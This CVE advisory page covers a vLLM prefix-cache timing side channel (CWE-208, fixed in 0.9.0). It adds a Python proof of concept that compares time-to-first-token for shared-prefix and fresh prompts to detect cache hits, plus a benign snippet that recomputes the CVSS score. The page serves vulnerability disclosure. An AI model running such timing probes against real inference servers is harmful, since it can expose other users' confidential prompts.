CVE-2025-46570

Published May 29, 2025

Last updated 2 months ago

Overview

Description
vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed and the PagedAttention mechanism finds a matching prefix chunk in its cache, the prefill phase speeds up, and that speedup is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are large enough to be detected and exploited as a side channel, letting an observer infer whether a given prefix has already been processed. This issue has been patched in version 0.9.0.
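The measurement at the heart of this side channel can be illustrated with a short, hedged sketch: the snippet below (an illustration only, not taken from the advisory) times the first streamed token returned by an OpenAI-compatible vLLM endpoint. The endpoint URL, model name, and probe prompts are assumptions made for the example; a noticeably lower TTFT for a probe that shares a prefix with previously submitted text would suggest a prefix-cache hit.

```python
# Hypothetical illustration of the timing measurement described above (CWE-208).
# Assumes a vLLM server exposing the OpenAI-compatible API at localhost:8000 and a
# model named "my-model"; both are placeholders, not values from the advisory.
import time
import requests

BASE_URL = "http://localhost:8000/v1/completions"  # assumed endpoint
MODEL = "my-model"                                  # assumed model name


def time_to_first_token(prompt: str) -> float:
    """Send a streaming completion request and return seconds until the first chunk."""
    payload = {
        "model": MODEL,
        "prompt": prompt,
        "max_tokens": 1,
        "stream": True,
    }
    start = time.monotonic()
    with requests.post(BASE_URL, json=payload, stream=True, timeout=30) as resp:
        resp.raise_for_status()
        for line in resp.iter_lines():
            if line:
                # The first non-empty streamed line approximates the first token's arrival.
                return time.monotonic() - start
    return float("inf")


# Probe prompts: one sharing a prefix that may already be cached, one fresh.
shared_prefix_probe = "SYSTEM PROMPT UNDER TEST ... continue the story:"
fresh_probe = "A completely unrelated prompt with no shared prefix:"

ttft_shared = time_to_first_token(shared_prefix_probe)
ttft_fresh = time_to_first_token(fresh_probe)
print(f"TTFT shared-prefix probe: {ttft_shared:.4f}s, fresh probe: {ttft_fresh:.4f}s")
```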
Source
security-advisories@github.com
NVD status
Undergoing Analysis

Risk scores

CVSS 3.1

Type
Secondary
Base score
2.6
Impact score
1.4
Exploitability score
1.2
Vector string
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N
Severity
LOW
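For reference, the listed sub-scores follow from applying the CVSS 3.1 base score formula to the vector above. The sketch below reproduces the arithmetic; the metric weights are the published CVSS 3.1 values for this vector's choices.

```python
import math

# CVSS 3.1 weights for AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N
AV, AC, PR, UI = 0.85, 0.44, 0.62, 0.62  # Network / High / Low (scope unchanged) / Required
C, I, A = 0.22, 0.0, 0.0                 # Confidentiality Low, Integrity None, Availability None

iss = 1 - (1 - C) * (1 - I) * (1 - A)    # Impact Sub-Score
impact = 6.42 * iss                      # Scope Unchanged
exploitability = 8.22 * AV * AC * PR * UI


def roundup(x: float) -> float:
    """CVSS 3.1 Roundup: smallest one-decimal value >= x."""
    return math.ceil(x * 10) / 10


base = roundup(min(impact + exploitability, 10)) if impact > 0 else 0.0
print(f"Impact: {impact:.1f}, Exploitability: {exploitability:.1f}, Base: {base}")
# -> Impact: 1.4, Exploitability: 1.2, Base: 2.6
```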

Weaknesses

security-advisories@github.com
CWE-208 (Observable Timing Discrepancy)

Social media

Hype score
Not currently trending